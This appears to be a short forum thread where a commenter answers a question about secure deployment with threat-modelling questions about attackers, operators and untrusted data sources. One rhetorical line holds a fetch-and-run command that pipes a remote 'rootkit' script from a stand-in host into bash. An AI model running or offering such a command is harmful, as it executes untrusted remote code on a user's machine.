top | item 38856406

(no title)

AzuraIsCool | 2 years ago

What is your proposed alternative for secure, future proof deploy?

discuss

order

justsomehnguy|2 years ago

> future proof deploy

Future proof deploy of what exactly?

What is the attack vector? Network, physical, both?

Who is the perpetrator? Nation, criminal, NSA, FSB, your disgruntled employee or your {business,sexual} partner trying to bury you?

Who is the operator of this machine? Do you trust him or do you explicitly do not? Does he runs 'curl https://haxx.me/rootkit.sh | bash' every day?

What about maid service?

What services or data is on the machine? Can it be triggered to execute something from a 3rd party endpoint? Do the data comes from the uncontrolled endpoints (eg Internet but this is not the only one vector)?